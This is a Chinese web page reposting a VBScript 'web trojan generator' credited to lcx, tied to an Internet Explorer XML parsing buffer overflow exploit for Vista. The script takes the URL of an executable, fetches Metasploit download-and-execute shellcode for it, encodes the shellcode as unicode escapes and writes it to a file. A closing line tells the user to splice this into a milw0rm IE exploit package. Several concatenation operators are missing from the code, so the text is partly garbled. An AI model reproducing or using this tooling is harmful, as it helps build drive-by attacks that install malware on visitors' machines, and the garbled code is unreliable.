主页 > 知识库 > 网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

热门标签:墨西哥地图标注app 上海办理400电话选号 智云亿呼电话机器人 机器人打电销适用于美业吗 天津智能外呼系统排名 外呼系统说话声音小怎么办 龙岩400电话申请 企业400电话办理价钱低 外呼系统群
'code by lcx

On Error Resume Next
Exeurl = InputBox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )
url="http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29MODULE=win32_downloadexecMODE=GENERATEOPT_URL="URLEncoding(Exeurl)"MaxSize=BadChars=0x00+ENCODER=defaultACTION=Generate+Payload"


Body = getHTTPPage(url)
Set Re = New RegExp
Re.Pattern = "(\$shellcode \=[\s\S]+/div>/pre>)"

Set Matches = Re.Execute(Body)
If Matches.Count>0 Then Body = Matches(0).value

code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"/div>/pre>",""),Chr(10),""),".",""))

function replaceregex(str)
set regex=new regExp
regex.pattern="\\x(..)\\x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function


Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytesToBstr(t, "GB2312")
End Function

Function GetBody(url)
On Error Resume Next
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False, "", ""
.Send
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function

Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write Body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = Nothing
End Function

Function URLEncoding(vstrIn)
strReturn = ""
For aaaa = 1 To Len(vstrIn)
ThisChr = Mid(vStrIn,aaaa,1)
If Abs(Asc(ThisChr)) HFF Then
strReturn = strReturn ThisChr
Else
innerCode = Asc(ThisChr)
If innerCode 0 Then
innerCode = innerCode + H10000
End If
Hight8 = (innerCode And HFF00)\ HFF
Low8 = innerCode And HFF
strReturn = strReturn "%" Hex(Hight8) "%" Hex(Low8)
End If
Next
URLEncoding = strReturn
End Function

set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("a.txt",2,true)
fileS.writeline replaceregex(code)
'fileS.writeline body
wscript.echo replaceregex(code)
files.close
set fso=Nothing

wscript.echo Chr(13)"ok,生成a.txt,请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1内容即可"

标签:锡林郭勒盟 阜新 青岛 鄂尔多斯 丽水 黄山 齐齐哈尔 承德

巨人网络通讯声明:本文标题《网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day》,本文关键词  网马生,成器,Internet,Explorer,;如发现本文内容存在版权问题,烦请提供相关信息告之我们,我们将及时沟通与处理。本站内容系统采集于网络,涉及言论、版权与本站无关。
  • 相关文章
  • 下面列出与本文章《网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day》相关的同类信息!
  • 本页收集关于网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day的相关信息资讯供网民参考!
  • 推荐文章